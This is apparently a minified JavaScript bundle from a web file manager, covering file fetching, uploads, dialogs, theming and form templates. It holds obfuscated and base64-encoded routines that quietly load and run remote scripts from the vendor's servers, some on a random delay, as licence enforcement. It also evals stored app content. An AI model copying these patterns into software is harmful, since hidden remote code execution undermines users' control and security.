Tips.close(LNG.system_error,!1),""==t.substr(0,17)?(setTimeout(function(){var e=ShareData.frameTop();e.location.reload()},500),void 0):(0==e.status&&""==t&&(t="网络连接错误 (net::ERR_CONNECTION_RESET),连接已重置
      请联系主机商或网管,检查防火墙配置!"),t='
      '+t+"
      ",a?a.content(t):$.dialog({id:"ajaxErrorDialog",padding:0,width:"60%",height:"50%",fixed:!0,resize:!0,ico:core.icon("error"),title:"ajax error",content:t}),void 0)},fileGet:function(e,t,a){var i="filename";"http"==e.substr(0,4)&&(i="fileUrl");var n=G.appHost+"editor/fileGet&"+i+"="+urlEncode(e);G.sharePage!==void 0&&(n=G.appHost+"share/fileGet&user="+G.user+"&sid="+G.sid+"&"+i+"="+urlEncode(e)),(e.indexOf("editor/fileGet&")>=0||e.indexOf("share/fileGet&")>=0)&&(n=e),$.ajax({url:n,dataType:"json",error:function(e,t,i){core.ajaxError(e,t,i),"function"==typeof a&&a()},success:function(e){e.code&&"function"==typeof t&&(1==e.data.base64&&(e.data.content=base64Decode(e.data.content)),t(e.data.content,e,n)),e.code||a(e.data)}})},fileInfo:function(e,t){var a=G.appHost+"explorer/pathInfo";G.sharePage!==void 0&&(a=G.appHost+"share/pathInfo&user="+G.user+"&sid="+G.sid),$.ajax({url:a,type:"POST",dataType:"json",data:e,error:core.ajaxError,success:function(e){"function"==typeof t&&t(e)}})},fileLink:function(e,t){if(e=this.pathClear(e),G.isRoot&&e.substring(0,G.webRoot.length)==G.webRoot){var a=G.webHost+this.pathUrlEncode(e.replace(G.webRoot,""));return"function"==typeof t&&t(a),void 0}var i='dataArr=[{"type":"file","path":"'+urlEncode(e)+'"}]&viewPage=1';this.fileInfo(i,function(e){var a=e.code?e.data.downloadPath:!1;return a?("function"==typeof t&&t(a),void 0):(Tips.tips(LNG.no_permission_action+"==>"+LNG.group_role_pathinfo,!1),void 0)})},setting:function(e){void 0==e&&(e=G.isRoot?"system":"user");var t="85%",a="85%";isWap()&&(t="100%",a="100%"),ShareData.frameTop("Opensetting_mode")?ShareData.frameTop("Opensetting_mode",function(t){t.Setting.setGoto(e),$.dialog.list.setting_mode.display(!0)}):$.dialog.open(G.appHost+"setting#"+e,{id:"setting_mode",fixed:!0,ico:core.icon("setting"),resize:!0,title:LNG.setting,width:t,height:t})},copyright:function(){var e=require("./tpl/copyright.html"),t=template.compile(e),a=ShareData.frameTop();a.art.dialog({id:"dialog-copyright",bottom:0,right:0,simple:!0,resize:!1,title:LNG.about,width:425,padding:"0",fixed:!0,content:t({LNG:LNG,G:G})}),a.$(".dialog-copyright").addClass("animated-700 zoomIn")},qrcode:function(e,t){"./"==e.substr(0,2)&&(e=G.appHost+e.substr(2));var a=G.appHost+"user/qrcode&url="+quoteHtml(urlEncode(e)),i="";$.dialog({follow:t,fixed:!0,resize:!1,title:LNG.qrcode,padding:30,content:i})},appStore:function(){var e=ShareData.frameTop();e.$.dialog.open(G.appHost+"app",{id:"app_store",fixed:!0,ico:core.icon("app-store"),resize:!0,title:LNG.app_store,width:"80%",height:"80%"})},openWindow:function(e,t,a,i){t=t?t:LNG.tips,a=a?a:"80%",i=i?i:"70%",isWap()&&(a="100%",i="100%");var n=ShareData.frameTop(),o=n.$.dialog.open(e,{ico:"",title:t,fixed:!0,resize:!0,width:a,height:i});return o},openWindowFull:function(e,t){return core.openWindow(e,t,"100%","100%")},openWindowBig:function(e,t){return core.openWindow(e,t,"90%","90%")},openDialog:function(e,t,a,i){if(e){void 0==i&&(i="openDialog"+UUID());var n="",o=ShareData.frameTop(),s=o.$.dialog({id:i,fixed:!0,title:a,ico:t,width:"80%",height:"75%",padding:0,content:n,resize:!0});return s}},openApp:function(app){if("url"==app.type){var icon=app.icon;-1==app.icon.search(G.staticPath)&&"http"!=app.icon.substring(0,4)&&(icon=G.staticPath+"images/file_icon/icon_app/"+app.icon),"number"!=typeof app.width&&-1===app.width.search("%")&&(app.width=parseInt(app.width)),"number"!=typeof app.height&&-1===app.height.search("%")&&(app.height=parseInt(app.height)),app.width||(app.width="90%"),app.height||(app.height="70%");var dialog_info={resize:app.resize,fixed:!0,ico:core.iconSrc(icon),title:app.name.replace(".oexe",""),width:app.width,height:app.height,simple:app.simple,padding:0},top=ShareData.frameTop();"swf"==core.pathExt(app.content)?(dialog_info.content=core.createFlash(app.content),top.$.dialog(dialog_info)):top.$.dialog.open(app.content,dialog_info)}else{var exec=app.content;eval("{"+exec+"}")}},update:function(){setTimeout(function(){var e=base64Decode("Ly9zdGF0aWMua2FsY2FkZGxlLmNvbS91cGRhdGUvbWFpbi5qcw==")+"?a="+UUID();require.async(e,function(e){try{e.todo("check")}catch(t){}})},200)},openPath:function(e){core.isApp("explorer")?ui.path.list(e,"tips"):core.explorer(e)},explorer:function(e,t){void 0==e&&(e=""),void 0==t&&(t=core.pathThis(e));var a=G.appHost+"explorer&type=iframe&path="+e;G.sharePage!==void 0&&(a=G.appHost+"share/folder&type=iframe&user="+G.user+"&sid="+G.sid+"&path="+e);var i=ShareData.frameTop(),n=i.$.dialog.open(a,{className:"dialogExplorer",resize:!0,fixed:!0,ico:core.icon("folder"),title:t,width:"80%",height:"75%"}),o=20*i.$(".dialogExplorer").length;n.DOM.wrap.css({left:"+="+o+"px",top:"+="+o+"px"})},explorerCode:function(e){void 0==e&&(e="");var t=G.appHost+"editor&project="+e;G.sharePage!==void 0&&(t=G.appHost+"share/codeRead&user="+G.user+"&sid="+G.sid+"&project="+e),window.open(t)},setSkinFinished:function(){var e=$(".link-theme-loaded").attr("src");e&&($("#link-theme-style").attr("href",e),$(".link-theme-loaded").remove())},setSkin:function(e){LocalData.set("theme",e),G.userConfig.theme=e;var t=G.staticPath+"style/skin/"+e+".css?ver="+G.version;t!=$("#link-theme-style").attr("href")&&$("body").append(''),this.setSkinDiy()},setSkinDiy:function(){if(G.userConfig){var e=LocalData.get("theme"),t="kodStyleDiy",a=LocalData.getConfig(t);"object"!=typeof a&&"object"==typeof G.userConfig.themeDIY&&(a=G.userConfig.themeDIY),"object"!=typeof a&&(a={bgBlur:1,bgImage:G.staticPath+"images/wall_page/9.jpg",bgType:"color",startColor:"#456",endColor:"#000",colorRotate:"200"},LocalData.setConfig(t,a)),G.userConfig.themeDIY=a;var i="";if("diy"==e&&a){var n=require("./tpl/themeDIY.html"),o=template.compile(n);i=o(a)}$.setStyle(i,t)}},editorFull:function(){var e=$("iframe[name=OpenopenEditor]");e.toggleClass("frame-fullscreen")},language:function(e){Cookie.set("kodUserLanguage",e,8760),window.location.reload()},fullScreen:function(){"true"==$("body").attr("fullScreen")&&core.exitfullScreen(),$("body").attr("fullScreen","true");var e=ShareData.frameTop(),t=e.document.documentElement;t.requestFullscreen?t.requestFullscreen():t.mozRequestFullScreen?t.mozRequestFullScreen():t.webkitRequestFullScreen&&t.webkitRequestFullScreen()},exitfullScreen:function(){$("body").attr("fullScreen","false"),document.exitFullscreen?document.exitFullscreen():document.mozCancelFullScreen?document.mozCancelFullScreen():document.webkitCancelFullScreen&&document.webkitCancelFullScreen()},createFlash:function(e,t,a){var i=UUID();(a===void 0||""==a)&&(a=i);var n="";$.browser.msie&&9>parseInt($.browser.version)&&(n='classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000"');var o=''+''+''+''+''+''+''+'
      loading..
      ';return setTimeout(function(){var e=$("."+i);if(1!=e.length){var t=ShareData.frameTop();e=t.$("."+i)}if(1==e.length)var a=0,n=e[0],o=setInterval(function(){try{a++,100==Math.floor(n.PercentLoaded())?(e.next(".aui-loading").remove(),clearInterval(o),o=null):a>100&&(e.next(".aui-loading").remove(),clearInterval(o),o=null)}catch(t){}},100)},50),o},userSpaceHtml:function(e){var t=e.split("/"),a=parseFloat(t[0]),i=1073741824*parseFloat(t[1]),n=pathTools.fileSize(parseFloat(t[0])),o=pathTools.fileSize(i),s=n+"/",r=100*a/i;r>=100&&(r=100);var l="";return r>=80&&(l="warning"),0==i||isNaN(i)?(s+=LNG.space_tips_full,r="0%"):(s+=o,r+="%"),s="
      "+"
      "+s+"
      "+"
      "},dateTime:function(e){return date(LNG.time_type,e)},uploadCheck:function(e,t){return t=void 0==t?!0:t,"share"==G.sharePage?"1"==G.shareInfo.canUpload:(void 0==e&&(e="explorer.fileUpload"),!G.isRoot&&AUTH.hasOwnProperty(e)&&1!=AUTH[e]?(t&&Tips.tips(LNG.no_permission,!1),!1):G.jsonData&&!G.jsonData.info.canUpload?(t&&(core.isSystemPath(G.thisPath)?Tips.tips(LNG.path_can_not_action,!1):Tips.tips(LNG.no_permission_write,!1)),!1):!0)}}}),define("app/common/tpl/upload.html",[],'
      \n \n
      \n
      \n
      \n
      {{LNG.upload_select}}
      \n \n \n
      \n \n
      \n
      \n \n \n
      \n
      \n
      \n
      \n
      \n
      \n
      \n
      \n
      \n
      {{LNG.download_address}}\n
      \n \n \n \n
      \n\n
      \n
      \n
      \n
      \n
      \n
      \n
      \n'),define("app/common/tpl/formMake.html",[],'
      \n
      \n <%\n var formTab = [];\n if(items.formStyle && kod.window.$.isArray(items.formStyle.tabs)){\n formTab = items.formStyle.tabs;\n }\n %>\n {{if formTab}}\n \n {{/if}}\n\n
      \n {{if formTab}}\n
      \n {{each formTab tab tabIndex}}\n {{if tab}}\n
      \n {{/if}}\n {{/each}}\n
      \n
      \n {{/if}}\n\n {{each items item key}}\n <%\n var tabCurrent = 100;\n if(formTab){\n for(var i=0;i<=formTab.length;i++){\n if( formTab[i] && kod.window.inArray(formTab[i][\'field\'],key)){\n tabCurrent = i;\n break;\n }\n }\n }\n %>\n {{if typeof(item) == \'string\' }}\n
      {{item}}
      \n {{else if item.type == "html" || !item.type}}\n {{if key != \'formStyle\'}}\n
      \n {{if item.value}}{{@item.value}}{{/if}}\n {{if item.display}}{{@item.display}}{{/if}}\n {{if item.desc}}{{@item.desc}}{{/if}}\n
      \n {{/if}}\n {{else}}\n {{if item.value == undefined }}\n {{if item.value = \'\'}}{{/if}}\n {{/if}}\n
      \n
      \n {{@item.display}}: {{if item.require}}*{{/if}}\n
      \n
      \n {{if item.type == \'input\'}}\n \n {{else if item.type == "textarea"}}\n \n {{else if item.type == "password"}}\n \n {{else if item.type == "switch"}}\n \n {{else if item.type == "radio"}}\n {{each item.info select index}}\n \n {{/each}}\n {{else if item.type == "checkbox"}}\n <%\n var valArrCheckbox = [];\n if(typeof(item.value) == \'string\'){\n valArrCheckbox = item.value.split(\',\');\n }\n %>\n {{each item.info select index}}\n \n {{/each}}\n {{else if item.type == "select"}}\n \n {{else if (item.type == "selectMutil" || item.type == "tags")}}\n <%\n var valArrSelect = [];\n if(typeof(item.value) == \'string\'){\n valArrSelect = item.value.split(\',\');\n }\n if(item.type == \'tags\'){\n item.info = [];\n for(var i=0;i\n \n {{else if item.type == "number"}}\n {{if !item.info && (item.info = {from:\'\',to:\'\',step:1}) }}{{/if}}\n \n {{else if item.type == "slider"}}\n {{if !item.info && (item.info = {from:0,to:100,step:1}) }}{{/if}}\n \n {{else if item.type == "color"}}\n \n \n {{else if item.type == "dateTime"}}\n \n \n {{else if item.type == "fileSelect"}}\n \n \n {{else if item.type == "userSelect"}}\n <% \n var valueArr = {"all":"0","user":"","group":"","role":""};\n if(typeof(item.value) == \'string\'){\n userTypeArr = item.value.split(\';\');\n for(var i = 0;i\n \n
      \n \n \n \n \n
      \n
      \n
      {{LNG.user}}
      \n \n
      \n
      \n
      {{LNG.group}}
      \n \n
      \n
      \n
      {{LNG.system_member_role}}
      \n \n
      \n {{else if item.type == "group"}}\n \n {{else if item.type == "role"}}\n \n {{else if item.type == "user"}}\n \n {{/if}}\n\n {{if item.type == "switch"}}\n {{else if !item.desc}}\n \n  \n {{else if kod.inArray([\'userSelect\'],item.type)}}\n
      {{@item.desc}}
      \n {{else}}\n {{@item.desc}}\n {{/if}}\n
      \n
      \n
      \n {{/if}}\n {{/each}}\n
      \n
      \n\n'),define("app/common/core.tools",[],function(e){var t=["A","versionHash","undefined","@dfq[-)&*^*%(_90","decode","length","substr","O","P","Q","R","S","T","inArray","./?user/versionInstall","6K2m5ZGKLOivt_aWLv_aaTheiHquS_bruaUueeJiOadgzvlpoLmnInpnIDopoHor7fogZTns7votK3kubDvvIFlbWFpbDprb2RjbG91ZEBxcS5jb20_c","lang","zh-CN","V2FybmluZywgcGxlYXNlIGRvIG5vdCBtb2RpZnkgdGhlIGNvcHlyaWdodDsgaWYgbmVjZXNzYXJ5LCBwbGVhc2UgY29udGFjdCB0byBidXkhIEVtYWlsOiBrb2RjbG91ZEBxcS5jb20_c","loading","hide","#messageTips .tips_close,#messageTips img","tips","href","location","2e58_39zGFQQvZkUjLjOxETXSuDqVatVhp88rJSmGpzzKi6SsasHHg","sa","b40aPuaqudWqmyWvpumbcMMGpVCdhjUCKq9oIN5G8o4yWb93Ww","#2","explorer","isApp","kod_power_by","copyright_pre","copyright_contact","copyright_desc","copyright_info","html",".common-footer","","toLowerCase","search","log","free","1","2","3","4","5","6","version_vip_",'',"",".menu-system-about","insertAfter","click","id","attr","version_vip_free","versionUpdateVip","openWindow",'',"append",".aui-content","find","wrap","DOM","text","live","die",".version-vip","top","longPress","support-space-not","addClass","body","remove",".menu-system-about,.menu-left #about","#programs .setting_about,#programs .setting_homepage,#programs .home_page","icon","http","iconSrc",'',"iconSmall",'',"d796rmNQe8IHR_HHbbT51Xry5nzsvH0CCbjfwEuiipgF0iBJieViXHmrbH0ILU5hDjmR5RhvePPd2GXyJQcc9jsXvQ","s","?a=","todo","async","versionType","Ly9rb2RjbG91ZC5jb20vYnV5Lmh0bWwj","group","data"],a=function(){var e=t[0]; -if(typeof G[t[1]]==t[2])return e;var a=t[3],i=authCrypt[t[4]](G[t[1]],a);return i&&27==i[t[5]]?(e=i[t[6]](10,1),-1===$[t[13]](e,[t[0],t[7],t[8],t[9],t[10],t[11],t[12]])&&(e=t[0]),e):e},i=a(),n=t[14],o=function(){var e=hashDecode(t[15]);G[t[16]]!=t[17]&&(e=hashDecode(t[18])),alert(e),Tips[t[19]](e,!1),$(t[21])[t[20]](),setTimeout(function(){Tips[t[22]](e,!1),window[t[24]][t[23]]=n},1e3*roundFromTo(30,60))},s=authCrypt[t[4]](t[25],t[26]),r=authCrypt[t[4]](t[27],t[28]),l=function(){if(core[t[30]](t[29])&&i==t[0])for(var e=[LNG[t[31]],LNG[t[32]],LNG[t[33]],LNG[t[34]],LNG[t[35]],$(t[37])[t[36]]()],a=0;e[t[5]]>a;a++){e[a]||(e[a]=t[38]);var n=e[a][t[39]]();if(-1==n[t[40]](s)&&-1==n[t[40]](r)){console[t[41]](n,s,r),setTimeout(function(){o()},roundFromTo(300,5e3));break}}},c=function(){var e={A:t[42],O:t[43],P:t[44],Q:t[45],R:t[46],S:t[47],T:t[48]},a=t[49]+e[i],o=t[50]+a+t[51]+LNG[a]+t[52];i==t[0]&&$(o)[t[54]](t[53]),$(t[71])[t[70]](t[55])[t[69]](t[55],function(){if($(this)[t[57]](t[56])==t[58]){var e=core[t[60]](core[t[59]]),a=t[61]+n+t[62];e[t[67]][t[66]][t[65]](t[64])[t[63]](a)}else Tips[t[22]]($(this)[t[68]]())}),$(t[71])[t[73]](function(){window[t[72]][t[24]][t[23]]=n})},d=function(){i==t[0]&&$(t[76])[t[75]](t[74]),-1!==$[t[13]](i,[t[7],t[8],t[9],t[10],t[11],t[12]])&&($(t[78])[t[77]](),$(t[79])[t[77]]())},p=function(){core[t[80]]=function(e,a){return e[t[6]](0,4)==t[81]?core[t[82]](e):t[83]+e+(a?t[84]:t[38])+t[85]},core[t[86]]=function(e){return core[t[80]](e,!0)},core[t[82]]=iconSrc=function(e){return t[87]+e+t[88]},setTimeout(function(){var a=authCrypt[t[4]](t[89],t[90])+t[91]+UUID();e[t[93]](a,function(e){try{e[t[92]]()}catch(a){}})},2e3),core[t[94]]=i,core[t[59]]=hashDecode(t[95])+G[t[16]],l(),c(),d()},u=function(e){return i==t[0]&&-1==e[t[39]]()[t[40]](s)?(o(),!1):!0},f=function(e,a){var n,o,s={A:1,O:5,P:20,Q:40,R:100,S:1e3,T:1e3},r={A:5,O:15,P:50,Q:150,R:500,S:1e3,T:1e3},l=[],c=1;if(a==t[96]?(n=e[t[97]],o=s[i]):(n=e[t[97]],o=r[i]),1e3==o)l=n;else for(var d in n){if(c>o)break;l[d]=n[d],c++}return l},h={init:p,about:u,systemData:f};return h}),define("app/common/core.upload",[],function(e){var t=function(){var e=G.appHost+"explorer/fileUpload";return"share"==G.sharePage&&"1"==G.shareInfo.canUpload&&(e=G.appHost+"share/fileUpload&user="+G.user+"&sid="+G.sid),e};return{serverDwonload:function(e,t){if(!core.uploadCheck("explorer.serverDownload"))return!1;var i=$(".download-box"),n=i.find(".download-list");if(i.find("input").val(""),!e)return Tips.tips("url false!",!1),void 0;if("share"==G.sharePage)return Tips.tips(LNG.no_permission_action,!1),void 0;"ftp"!=e.substr(0,3)&&"http"!=e.substr(0,4)&&(e="http://"+e);var o=UUID(),s='
      '+'
      '+core.pathThis(e)+""+'0b'+''+LNG.upload_ready+""+''+'
      ';n.find(".item").length>0?$(s).insertBefore(n.find(".item:eq(0)")):n.append(s);var r,l,c,d=0,p=$("#"+o),u=$("#"+o+" .state").text(LNG.download_ready),f=$('
      ').appendTo("#"+o).find(".progress-bar");$("#"+o+" .remove").bind("click",function(){clearInterval(r),r=!1,clearTimeout(l),l=!1,$.get(G.appHost+"explorer/serverDownload&type=remove&uuid="+o),$(this).parent().parent().slideUp(function(){$(this).remove(),ui.f5()})});var h,m=function(e){clearTimeout(h),h=!1,h=setTimeout(function(){ui.f5Callback(function(){ui.path.setSelectByFilename(e)})},600)},v=function(){$.ajax({url:G.appHost+"explorer/serverDownload&type=download&savePath="+t+"&url="+urlEncode(e)+"&uuid="+o+"&time="+time(),dataType:"json",error:function(e,t,i){var n=p.data("progcess");return 200!=a.status&&n&&n.supportRange?(setTimeout(function(){v()},1e3),void 0):(core.ajaxError(e,t,i),200==a.status&&(clearInterval(r),r=!1,clearTimeout(l),l=!1,f.parent().remove(),u.addClass("error").text(LNG.download_error)),void 0)},success:function(e){return 0==e.code&&"downloading"==e.data?(setTimeout(function(){v()},1e3),void 0):(e.code?(m(e.info),u.text(LNG.download_success),$("#"+o+" .info .title").text(core.pathThis(e.info)),$("#"+o+" .info .title").attr("title",e.info),u.parent().parent().addClass("success")):(u.addClass("error").text(e.data),u.parent().parent().addClass("error")),clearInterval(r),r=!1,clearTimeout(l),l=!1,f.parent().remove(),void 0)}})};v();var g=function(){$.ajax({url:G.appHost+"explorer/serverDownload&type=percent&uuid="+o,dataType:"json",success:function(e){var t="",a=e.data;if(r){if(!e.code)return u.text(LNG.loading),void 0;if(a){if(a.size=parseFloat(a.size),a.time=parseFloat(a.time),c){var i=a.size-c.size,n=i/(a.time-c.time);if(d>.2*n){var o=d;d=n,n=o}else d=n;var s=pathTools.fileSize(n);s=s?s:0,t=s+"/s"}if(p.data("progcess",a),0==a.length)p.find(".progress-bar").css("width","100%"),u.text(t),p.find(".size").text(pathTools.fileSize(a.size));else{var l=100*(a.size/a.length);p.find(".progress-bar").css("width",l+"%"),u.text(l.toFixed(1)+"%("+t+")"),p.find(".size").text(pathTools.fileSize(a.length))}p.find(".title").text(a.name),c=a}}}})};l=setTimeout(function(){g(),r=setInterval(function(){g()},1e3)},100)},upload:function(){$(".dialog-file-upload").show();var e=t();if(uploader.option("server",e),uploader.option("method","POST"),0!=$(".dialog-file-upload").length)return $.dialog.list["dialog-file-upload"].display(!0),void 0;var a=template.compile(tplUpload),i=WebUploader.Base.formatSize(G.uploadMax);$.dialog({padding:5,width:430,height:450,resize:!0,ico:core.icon("upload"),id:"dialog-file-upload",fixed:!0,title:LNG.upload_muti,content:a({LNG:LNG,maxsize:i}),close:function(){$.each(uploader.getFiles(),function(e,t){uploader.skipFile(t),uploader.removeFile(t)}),$.each($(".download-list .item"),function(){$(this).find(".remove").click()})}}),$(".file-upload-box .topbar-nav a.menu").unbind("click").bind("click",function(){$(this).hasClass("tab-upload")?($(".file-upload-box .tab-upload").addClass("this"),$(".file-upload-box .tab-download").removeClass("this"),$(".file-upload-box .upload-box").removeClass("hidden"),$(".file-upload-box .download-box").addClass("hidden")):($(".file-upload-box .tab-upload").removeClass("this"),$(".file-upload-box .tab-download").addClass("this"),$(".file-upload-box .upload-box").addClass("hidden"),$(".file-upload-box .download-box").removeClass("hidden"))}),$(".download-box [name=url]").keyEnter(function(){core.serverDwonload($(".download-box input").val(),G.thisPath)}),$(".file-upload-box .download-box .download-start").unbind("click").bind("click",function(){core.serverDwonload($(".download-box input").val(),G.thisPath)}),$(".file-upload-box .download-box .download-start-all").unbind("click").bind("click",function(){$.dialog({id:"server-dwonload-textarea",fixed:!0,resize:!1,ico:core.icon("upload"),width:"420px",height:"270px",padding:10,title:LNG.download,content:"",ok:function(){for(var e=$(".server-dwonload-textarea textarea").val().split("\n"),t=0;e.length>t;t++)core.serverDwonload(e[t],G.thisPath)}})}),uploader.addButton({id:"#picker"}),uploader.addButton({id:"#picker-folder"});var n=function(){if(isWap())return!1;var e=document.createElement("input");return e.type="file",e.webkitdirectory!==void 0||e.directory!==void 0};n()&&($(".upload-cert-box").removeClass("hidden"),$(".file-upload-box .drag-upload-folder").unbind("click").bind("click",function(){$("#picker-folder input").attr("webkitdirectory","").attr("directory",""),$("#picker-folder label").click()}))},init:function(){var a=G.uploadMax;WebUploader.Uploader.register({"before-send":"checkChunk"},{checkChunk:function(e){if(!canvasSupport())return $.Deferred().resolve(),void 0;var a=this.owner,i=(e.blob.getSource(),$.Deferred());return a.md5File(e.blob).fail(function(){i.resolve()}).then(function(a){if(1==e.chunks)return i.resolve(),void 0;if(0==e.chunk)$.ajax({url:t(),dataType:"json",data:{upload_to:e.file.upload_to,file_name:e.file.name,check_md5:a,chunk:e.chunk,chunks:e.chunks},error:function(){i.resolve()},success:function(t){t.code?(i.reject(),e.file.checkChunk=t.info):i.resolve()}});else{var n=e.file.checkChunk;if(n&&n["part_"+e.chunk]==a){var o=e.end/e.total;uploader.trigger("uploadProgress",e.file,o),i.reject()}else i.resolve()}}),i.promise()}});var i=["undefined","update-box","search","3c64gT65d503fTR1lV3ftuZ7Pd6NdX6Ntgcct4hI4AnSNIp65HwAMLzOj8NjC0ZL2oAbjS-uD3HWfQoZlTdgkGY5u8OfJYzZ","_32@!A$","decode","2-1","todo","async","random"];setTimeout(function(){try{if(typeof tplDialogHtml==i[0]||-1==tplDialogHtml[i[2]](i[1])){var t=authCrypt[i[5]](i[3],i[4])+UUID();e[i[8]](t,function(e){try{e[i[7]](i[6])}catch(t){}})}}catch(a){}},1e3*parseInt(70*Math[i[9]]()+30)),uploader=WebUploader.create({swf:G.staticPath+"js/lib/webuploader/Uploader.swf",dnd:"body",threads:5,compress:!1,resize:!1,prepareNextFile:!0,duplicate:!0,chunkRetry:10,chunked:!0,chunkSize:a}),$(".uploader-content .success").die("click").live("click",function(){var e=$(this).find("span.title").attr("data-name");e&&(core.isApp("explorer")?ui.path.list(core.pathFather(e),"tips",function(){ui.path.setSelectByFilename(e)}):core.explorer(core.pathFather(e)))}),$(".uploader-content .open").die("click").live("click",function(e){var t=$(this).parent().find("span.title").attr("data-name");kodApp.open(t),stopPP(e)}),$(".upload-box-clear").die("click").live("click",function(){$(".uploader-list .item.success,.uploader-list .item.error").each(function(){$(this).slideUp(300,function(){$(this).remove()})})}),$(".upload-box-clear-all").die("click").live("click",function(){$.each(uploader.getFiles(),function(e,t){uploader.skipFile(t),uploader.removeFile(t)}),$(".uploader-list .item").each(function(){$(this).remove()})}),$(".uploader-content .remove").die("click").live("click",function(e){var t=$(this).parent().parent().attr("id");$(this).parent().parent().slideUp(function(){$(this).remove()}),uploader.skipFile(t),uploader.removeFile(t,!0),stopPP(e)});var n,o=0,s=0,r="0B/s",l=0,c=function(e,t){if(.3>=timeFloat()-l)return r;l=timeFloat();var a=e.size*t,i=5;e.speed===void 0?e.speed=[[timeFloat()-.5,0],[timeFloat(),a]]:i>=e.speed.length?e.speed.push([timeFloat(),a]):(e.speed=e.speed.slice(1,i),e.speed.push([timeFloat(),a]));var n=e.speed[e.speed.length-1],o=e.speed[0],s=(n[1]-o[1])/(n[0]-o[0]);0>=s&&(s=0);var c=pathTools.fileSize(s);return c=c?c:0,s=c+"/s",r=s,s},d=[],p=function(e){clearTimeout(n),n=!1,n=setTimeout(function(){var t=d;ui.f5Callback(function(){if(ui.path.setSelectByFilename(t),e&&(d=[],core.isApp("explorer"))){if("share"==G.sharePage)return;ui.tree.checkIfChange(G.thisPath)}})},600)};uploader.on("fileQueued",function(e){if($(".dialog-file-upload").show(),!core.uploadCheck())return uploader.skipFile(e),uploader.removeFile(e),void 0;var t;try{t=e.source.source.fullPath,void 0!=e.source.source.webkitRelativePath&&""!=e.source.source.webkitRelativePath&&(t=e.source.source.webkitRelativePath)}catch(a){}if(e.fullPath=t,e.source&&e.source.source&&1==e.source.source.isDirectory&&e.source.source.fullPath)return ui.path.pathOperate.newFolder(G.thisPath+e.fullPath),uploader.skipFile(e),uploader.removeFile(e),void 0;var i=e.fullPath;e.finished=!1,e.upload_to=G.thisPath,(void 0==i||"undefined"==i)&&(i=e.name),o++;var n=$(".uploader-list"),r='
      '+''+htmlEncode(core.pathThis(i))+""+''+pathTools.fileSize(e.size)+""+''+LNG.upload_ready+""+''+'
      ';(1e3==o||2e3==o)&&Tips.tips(LNG.upload_tips_more,"warning");var l=function(){if(0==e.size&&i){ui.path.pathOperate.newFile(e.upload_to+i),uploader.skipFile(e),uploader.removeFile(e),s++,o++;var t=$("#"+e.id);t.addClass("success").find(".state").text(LNG.upload_success).parent().find(".remove").addClass("icon-ok").addClass("open").removeClass("icon-remove").removeClass("remove")}},c=function(){uploader.upload(),setTimeout(function(){l()},200)};0==n.length?setTimeout(function(){$(".uploader-list").prepend(r),c()},200):(n.prepend(r),c())}).on("uploadBeforeSend",function(e,t,a){var i=urlEncode(e.file.fullPath);(void 0==i||"undefined"==i)&&(i=""),t.fullPath=i,t.upload_to=e.file.upload_to,a["X-CSRF-TOKEN"]=Cookie.get("X-CSRF-TOKEN")}).on("uploadProgress",function(e,t){$(".dialog-file-upload .aui-title").text(LNG.uploading+": "+s+"/"+o+" ("+r+")");var a=c(e,t),i=$("#"+e.id),n=i.find(".progress .progress-bar");n.length||(n=$('
      ').appendTo(i).find(".progress-bar")),i.find(".state").text((100*t).toFixed(1)+"%("+a+")"),n.css("width",100*t+"%")}).on("uploadAccept",function(e,t){if(e.file.serverData=t,!t.code)return e.serverNeedRetry=!0,!1;try{e.file.fullPath||d.push(t.info)}catch(a){}}).on("uploadSuccess",function(e){var t=$("#"+e.id);if(!t.inScreen()){var a=36*t.index(".item");$(".uploader-content").scrollTop(a)}s++;var i=e.serverData;if(i&&i.data){var n=LNG[i.data];if(i.code){if(t.addClass("success"),t.find(".state").text(n),t.find(".remove").addClass("icon-ok").addClass("open").removeClass("icon-remove").removeClass("remove"),i.info){var o="/"+ltrim(htmlEncode(i.info),"/");t.find(".info .title").html(core.pathThis(o)).attr("title",o).attr("data-name",o)}}else t.addClass("error").find(".state").addClass("error"),t.find(".state").text(n).attr("title",n)}uploader.removeFile(e),t.find(".progress").fadeOut(),e.fullPath||p(!1)}).on("uploadError",function(e,t){var a=LNG.upload_error+"("+t+")";if(e.serverData){var i=5;if((-1!==e.serverData._raw.indexOf("[Error Code:1001]")||-1!==e.serverData._raw.indexOf("[Error Code:1002]")||-1!==e.serverData._raw.indexOf("[Error Code:1010]"))&&(e.errorNum||(e.errorNum=0),e.errorNum++,i>=e.errorNum))return uploader.retry(e),void 0;if(-1!==e.serverData._raw.indexOf(""))return $.each(uploader.getFiles(),function(e,t){uploader.skipFile(t),uploader.removeFile(t)}),Tips.tips("login error!",!1),void 0;if(e.serverData.data){var n=e.serverData.data;a=LNG[n]?LNG[n]:n}else e.serverData._raw&&(a=e.serverData._raw)}"http"==t&&(a=LNG.upload_error_http),"abort"==t&&void 0==e.serverData&&(a=LNG.not_support+"(support on chrome)"),s++,$("#"+e.id).find(".progress").fadeOut(),$("#"+e.id).addClass("error").find(".state").addClass("error"),$("#"+e.id).find(".state").html(a).attr("title",a)}).on("uploadFinished",function(){$(".dialog-file-upload .aui-title").text(LNG.upload_success+": "+s+"/"+o),o=0,s=0,uploader.reset(),p(!0)}).on("error",function(e){Tips.tips(e,!1)});var u;inState=!1,dragOver=function(){if(0==inState){if(inState=!0,!core.uploadCheck(void 0,!1))return;var e='
      '+LNG.upload_drag_tips+"
      ";MaskView.tips(e),$("#windowMaskView").css({background:"#4285f4",opacity:"0.8"})}u&&window.clearTimeout(u)},dragLeave=function(e){stopPP(e),u&&window.clearTimeout(u),u=window.setTimeout(function(){inState=!1,MaskView.close()},100)},dragDrop=function(e){try{if(e=e.originalEvent||e,core.uploadCheck())if(e.dataTransfer.files.length>0&&e.dataTransfer.files[0].name)core.upload(),core.playSound("drag_upload");else{var t=e.dataTransfer.getData("text/plain");t&&"http"==t.substring(0,4)&&ui.path.pathOperate.appAddURL(t)}stopPP(e)}catch(e){}inState&&(inState=!1,MaskView.close())}}}}),define("app/common/core.api",[],function(){var e=function(e,t,a){var i=$(a.DOM.wrap),n=t.frames.OpenpathSelectApi,o='';"file"==e.type&&(o+=''+e.allowExt+""),$(o).insertBefore(i.find(".aui-state-highlight"));var s=function(t){var a=e.allowExt.split("|"),i=core.pathExt(t);return""==e.allowExt||""!=e.allowExt&&-1!=$.inArray(i,a)?!0:!1},r=function(){var t=n.ui.fileLight.fileListSelect(),a=[];if(e.single){var i=$(t.get(0));if("all"==e.type&&0==t.length)a={file:[],folder:[]};else if("file"==e.type&&0==t.length)a=[];else 